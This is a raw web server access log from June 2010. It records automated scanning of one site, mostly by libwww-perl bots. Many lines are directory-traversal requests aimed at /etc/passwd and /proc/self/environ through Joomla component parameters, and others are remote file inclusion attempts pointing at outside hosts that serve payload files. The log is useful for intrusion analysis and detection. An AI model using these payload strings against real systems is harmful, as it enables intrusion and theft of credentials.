213.128.84.14 - - [01/Jun/2010:04:15:14 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
67.195.112.180 - - [01/Jun/2010:04:19:39 -0500] "GET /logs/access_log.1162166400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [01/Jun/2010:04:20:18 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.180.195 - - [01/Jun/2010:04:20:28 -0500] "GET /logs/index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:20:28 -0500] "GET /index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.194.109 - - [01/Jun/2010:04:20:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.109 - - [01/Jun/2010:04:20:33 -0500] "GET /artwork/mgbxpz1.JPG HTTP/1.1" 200 16759 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
91.121.180.195 - - [01/Jun/2010:04:20:40 -0500] "GET /logs/index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:20:40 -0500] "GET /index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:22:03 -0500] "GET /logs/index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:22:04 -0500] "GET /index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:22:15 -0500] "GET /logs/index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:22:15 -0500] "GET /index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:23:25 -0500] "GET /logs/index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:23:25 -0500] "GET /index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.18.167.170 - - [01/Jun/2010:04:23:31 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.121.180.195 - - [01/Jun/2010:04:23:31 -0500] "GET /logs/index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
95.156.233.139 - - [01/Jun/2010:04:23:31 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
67.18.167.170 - - [01/Jun/2010:04:23:31 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
95.156.233.139 - - [01/Jun/2010:04:23:31 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [01/Jun/2010:04:23:34 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.121.180.195 - - [01/Jun/2010:04:23:35 -0500] "GET /index.php?option=com_loudmounth&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
95.156.233.139 - - [01/Jun/2010:04:23:35 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
209.90.77.43 - - [01/Jun/2010:04:24:08 -0500] "GET /?base_folder=http://unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.90.77.43 - - [01/Jun/2010:04:24:08 -0500] "GET /logs/access_log.1271548800/?base_folder=http://unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.90.77.43 - - [01/Jun/2010:04:24:08 -0500] "GET /logs/?base_folder=http://unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
91.121.104.108 - - [01/Jun/2010:04:24:21 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.104.108 - - [01/Jun/2010:04:24:21 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:04:24:33 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:04:24:33 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:04:25:02 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:04:25:06 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:04:25:10 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
209.90.77.43 - - [01/Jun/2010:04:25:20 -0500] "GET /logs/access_log.1271030400/?base_folder=http://unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.90.77.43 - - [01/Jun/2010:04:25:21 -0500] "GET /logs/access_log.1270857600/?base_folder=http://unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
193.126.206.28 - - [01/Jun/2010:04:27:40 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:27:40 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.246.72.178 - - [01/Jun/2010:04:28:44 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:28:44 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:28:46 -0500] "GET /logs/access_log.1271030400//bemarket/postscript/postscript.php?p_mode=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:28:59 -0500] "GET /logs/access_log.1271808000//bemarket/postscript/postscript.php?p_mode=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
61.67.240.189 - - [01/Jun/2010:04:29:10 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:04:29:10 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:04:29:10 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:04:29:10 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
66.246.72.178 - - [01/Jun/2010:04:30:29 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:30:29 -0500] "GET /logs/access_log.1273363200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:30:29 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:30:35 -0500] "GET /logs/access_log.1273363200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:30:35 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:30:35 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:31:50 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:31:50 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:31:50 -0500] "GET /logs/access_log.1271548800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:32:20 -0500] "GET /logs/access_log.1271548800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:32:20 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:04:32:21 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ecohearth.com/tmp/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.67.240.189 - - [01/Jun/2010:04:32:21 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:04:32:21 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
118.129.166.213 - - [01/Jun/2010:04:32:43 -0500] "GET /logs/access_log.1274313600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
61.67.240.189 - - [01/Jun/2010:04:32:58 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:04:32:59 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
64.151.192.11 - - [01/Jun/2010:04:36:50 -0500] "GET /logs/index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:04:36:50 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:38:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:38:41 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:38:42 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:38:47 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:38:48 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:38:48 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.73.228.20 - - [01/Jun/2010:04:39:42 -0500] "GET /logs/*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.73.228.20 - - [01/Jun/2010:04:39:42 -0500] "GET /*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
217.16.18.219 - - [01/Jun/2010:04:41:58 -0500] "GET //lib/Loggix/Module/Calendar.php?pathToIndex=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-"""
217.16.18.219 - - [01/Jun/2010:04:41:59 -0500] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-"""
193.126.206.28 - - [01/Jun/2010:04:43:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:43:21 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:43:21 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:43:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:43:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:43:24 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:44:09 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:44:09 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:44:09 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:44:09 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:44:10 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:44:10 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.204.189 - - [01/Jun/2010:04:44:55 -0500] "GET /logs/access_log.1180396800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.177 - - [01/Jun/2010:04:45:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.177 - - [01/Jun/2010:04:45:56 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.126.206.28 - - [01/Jun/2010:04:49:03 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.126.206.28 - - [01/Jun/2010:04:49:11 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.180 - - [01/Jun/2010:04:53:18 -0500] "GET /logs/access_log.1218672000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/Jun/2010:04:53:44 -0500] "GET /logs/access_log.1200873600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/Jun/2010:04:54:29 -0500] "GET /logs/access_log.1214352000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.103.197.43 - - [01/Jun/2010:04:58:42 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.103.197.43 - - [01/Jun/2010:04:58:42 -0500] "GET /?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.103.197.43 - - [01/Jun/2010:04:58:42 -0500] "GET /logs/?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:05:03:47 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:05:03:48 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:05:03:49 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 337 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:05:04:44 -0500] "GET /logs/access_log.1271376000//admin/classes/TplLoad.php?full_path_to_public_program=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 337 "-""Mozilla/5.0"
112.216.153.186 - - [01/Jun/2010:05:05:31 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
112.216.153.186 - - [01/Jun/2010:05:05:39 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
112.216.153.186 - - [01/Jun/2010:05:05:39 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
112.216.153.186 - - [01/Jun/2010:05:05:40 -0500] "GET /logs/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.79"
213.128.84.14 - - [01/Jun/2010:05:09:03 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.128.84.14 - - [01/Jun/2010:05:09:03 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.128.84.14 - - [01/Jun/2010:05:09:03 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.128.84.14 - - [01/Jun/2010:05:09:19 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
213.128.84.14 - - [01/Jun/2010:05:09:19 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
213.128.84.14 - - [01/Jun/2010:05:09:19 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.11.114 - - [01/Jun/2010:05:09:21 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
189.108.172.26 - - [01/Jun/2010:05:09:59 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
189.108.172.26 - - [01/Jun/2010:05:10:07 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
189.108.172.26 - - [01/Jun/2010:05:10:45 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
74.55.43.66 - - [01/Jun/2010:05:10:55 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [01/Jun/2010:05:10:55 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
212.103.197.43 - - [01/Jun/2010:05:11:04 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.103.197.43 - - [01/Jun/2010:05:11:04 -0500] "GET /?option=com_gcalendar&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.103.197.43 - - [01/Jun/2010:05:11:04 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
195.190.166.35 - - [01/Jun/2010:05:11:35 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
195.190.166.35 - - [01/Jun/2010:05:11:35 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
195.190.166.35 - - [01/Jun/2010:05:11:35 -0500] "GET /logs/access_log.1212451200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??%0D?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
195.190.166.35 - - [01/Jun/2010:05:11:56 -0500] "GET /logs/access_log.1274227200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??%0D?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
189.108.172.26 - - [01/Jun/2010:05:11:59 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
189.108.172.26 - - [01/Jun/2010:05:12:01 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
189.108.172.26 - - [01/Jun/2010:05:12:03 -0500] "GET /logs/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.808"
189.108.172.26 - - [01/Jun/2010:05:12:03 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
189.108.172.26 - - [01/Jun/2010:05:12:04 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
189.108.172.26 - - [01/Jun/2010:05:12:06 -0500] "GET /logs/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.808"
74.55.43.66 - - [01/Jun/2010:05:12:09 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
89.238.145.196 - - [01/Jun/2010:05:12:31 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:05:12:31 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 303 "-""Mozilla/5.0"
